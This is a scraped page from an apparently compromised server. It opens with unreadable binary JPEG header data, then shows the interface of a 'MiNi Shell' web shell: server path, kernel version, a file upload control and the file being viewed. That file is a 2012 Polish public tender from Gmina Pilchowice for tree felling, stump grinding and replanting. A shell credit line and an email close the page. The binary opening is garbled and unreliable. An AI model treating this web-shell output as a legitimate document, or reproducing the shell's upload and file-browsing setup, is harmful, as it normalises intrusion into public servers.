JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120601/183686-N-2012.html

<p class="kh_header"><b>Pilchowice: Wycinka i pielęgnacja drzew w roku 2012 metodą alpinistyczną wraz z frezowaniem pni oraz nasadzeniem  zastępczym</b><br>
<b>Numer ogłoszenia: 183686 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pilchowice , ul. Damrota 6, 44-145 Pilchowice, woj. śląskie, tel. 032 2356521, faks 032 2356938.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ww.pilchowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka i pielęgnacja drzew w roku 2012 metodą alpinistyczną wraz z frezowaniem pni oraz nasadzeniem  zastępczym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wycięcie drzew różnych gatunków i o różnej średnicy pnia, w ilości ok. 50 sztuk, w tym drzewa przydrożne lub stanowiące zagrożenie bezpieczeństwa ludzi i mienia (należy uwzględnić wszelkie utrudnienia wynikające z usytuowania drzew w zabudowie, jak i kolizje z napowietrzna linia energetyczna)
2. Interwencyjne usuwanie drzew spowodowane miedzy innymi zjawiskami atmosferycznymi. Koszt interwencyjnego usuwania drzew będzie liczony wg. cen określonych w formularzu ofertowym.
3. Wykonanie zabiegów pielęgnacyjnych w drzewostanie, w tym ciec pielęgnacyjno-sanitarnych 
i technicznych oraz awaryjne usuniecie złamanych, pękniętych lub rozszczepionych konarów drzew, stanowiących zagrożenie bezpieczeństwa ludzi i mienia. Należy uwzględnić wszelkie utrudnienia wynikające z usytuowania drzew w zabudowie , jak i kolidowanie z linią energetyczną, itp.
4. Zrębkowanie gałęzi oraz wywóz zrębków na koszt oferenta w ilości około 50 szt.
5. Frezowanie pni tylko w stopniu wskazanym przez Zamawiającego w ilości 50 szt.
6. Nasadzenia zastępcze w ilości około 50szt. Dane o planowanych ilościach prac, o których mowa w  § 1 ust.3 pkt.1,4,5,6 mają charakter szacunkowy stanowiący element niezbędny służący wyborowi najkorzystniejszej oferty i nie stanowią ze strony Zamawiającego zobowiązań do  zlecenia prac w podanych ilościach.
	
Wykonawca dokona we własnym zakresie zakupu zleconych drzew. Przewiduje się nasadzenie 10szt. drzew z gat. klon szczepiony na pniu, 10szt.  drzew z gat. wierzba szczepiona na pniu, 10 szt. drzew z gat. daglezja, , 10 szt. drzew z gat. świerk srebrny i 10 szt. drzew z gatunku akacja szczepiona na pniu.
Wykonawca dokona ochronnego opalikowania drzew i będzie nawadniał nasadzone drzewo  przez okres 2 miesięcy minimum 1 raz w tygodniu. W cenie nasadzenia drzewa powinno być wliczone: zakup zleconego drzewa, opalikowanie, nawadnianie.
7. Uporządkowanie terenu po zakończeniu wyżej wymienionych prac. 
8. Po dokonaniu odbioru drewna przez przedstawiciela Zleceniodawcy teren należy doprowadzić do stanu pierwotnego- poprzez wyrównanie terenu w nieprzekraczalnym terminie 3 dni. Odbiór prac nastąpi po uporządkowaniu terenu.
Uwaga: w cenie za wycinkę oraz cięcie powinno być wliczone również zrębkowanie gałęzi. W cenę frezowania należy wliczyć zasypanie dołów po wyfrezowaniu.
Istotne warunki zamówienia:
1. Zamawiający wymaga wykonywania prac z zachowaniem szczególnej ostrożności, aby nie zniszczyć stosować odpowiednie zabezpieczenia, poprzez oznakowanie i wygrodzenie terenu, na którym wykonywane będą prace.
3. Zamawiający dopuszcza możliwość wykonywania prac przy użyciu podnośnika mechanicznego jedynie w przypadku drzew wskazanych przez Zamawiającego.
4. Wykonawca zobowiązany jest do zakupu pozyskanego drewna w cenie 100 zł/m3 brutto oraz
zagospodarowanie go we własnym zakresie.
5. Odbiór drewna następuje na miejscu wycinki, w terminie do 3 dni od daty zgłoszenia pozyskania drewna.
Drewno powinno być ułożone w stosy o wymiarach: wys. 1,05m, dł. 1m z jego wielokrotnością. Termin odbioru drewna jest jednoczesnym terminem odbioru prac (dopuszcza się możliwość częściowego odbioru drewna).
7. Wykonawca zobowiązany jest do  przystąpienia do prac najpóźniej 3dni  od otrzymania zlecenia pisemnego, faksem lub droga mailowa, na podstawie decyzji administracyjnej, będącej zezwoleniem na usuniecie przedmiotowego drzewa.
8. W przypadku nagłej, awaryjnej sytuacji, stanowiącej zagrożenie bezpieczeństwa, w tym złamanie się drzewa lub konaru wskutek wichury lub innych zjawisk atmosferycznych, Wykonawca winien przystąpić do prac niezwłocznie po otrzymaniu od Zamawiającego zlecenia pisemnego,  faksem lub mailem. Najpóźniej  3 godz. od otrzymania zleceniai.
9. Termin wykonania poszczególnych prac ustalany będzie każdorazowo i podawany na wystawianym przez Zamawiającego zleceniu.
10.Uporzadkowanie terenu po wykonaniu prac na danym obiekcie wykonać w nieprzekraczalnym terminie  3 dni.
11. Wywóz drewna może nastąpić wyłącznie po protokolarnym odbiorze.
12. Płatność za wykonane prace będzie odbywać się  po zakończeniu zlecenia wykonanego na danej jednostce, na podstawie wystawionej przez Wykonawcę faktury.
13. Wykonawca zobowiązany jest dołączyć do faktury protokół odbioru prac.
14. Koszty składowania odpadów na wysypisku komunalnym ponosi Wykonawca. 
15. Prace będą wykonywane tylko (nie dotyczy sytuacji awaryjnych) 
- w dni robocze (poniedziałek - piątek) w godzinach od 7:00 do 17:00
- w soboty w godzinach od 7:00 do 14:00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien przewidzieć możliwość korzystania  z następującego sprzętu: piła motorowa, frezarka do pni, rębak do rozdrabniania gałęzi, ciągnik rolniczy z przyczepą lub samochód ciężarowy do wywozu rozdrobnionych gałęzi</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian
	postanowień zawartej umowy:

2.1. Zmiana terminu realizacji przedmiotu zamówienia z powodu:
	a) działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności,
	b) wystąpienia zdarzeń mających wpływ na realizację przedmiotu umowy zależnych od  
         zamawiającego,
2.2. Zmiany osób zdolnych do wykonania zamówienia przedstawionych w ofercie, gdzie
	wykonawca proponuje zmianę osób w przypadkach:
	- gdy osoby te nie będą wywiązywały się z obowiązków wynikających z umowy,
	- choroby lub innych zdarzeń losowych,
	- jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od  
       wykonawcy np:  rezygnacji.
	Zamawiający może żądać od wykonawcy zmiany osób zdolnych do wykonania zamówienia	wymienionych w ofercie, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z   
      umowy.                                       
	W przypadku przedmiotowej zmiany, nowe osoby muszą spełniać wymagania określone dla danego specjalisty w  Specyfikacji Istotnych Warunków Zamówienia.
2.3. Zmiany osób sprawujących nadzór nad realizacją umowy - § 9 załączonego projektu umowy.
 3.   Zmiana i uzupełnienie umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pilchowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pilchowice
ul. Damrota 6
44-145 Pilchowice
 pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 10:00, miejsce: Urząd Gminy Pilchowice
ul. Damrota 6
44-145 Pilchowice
 pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com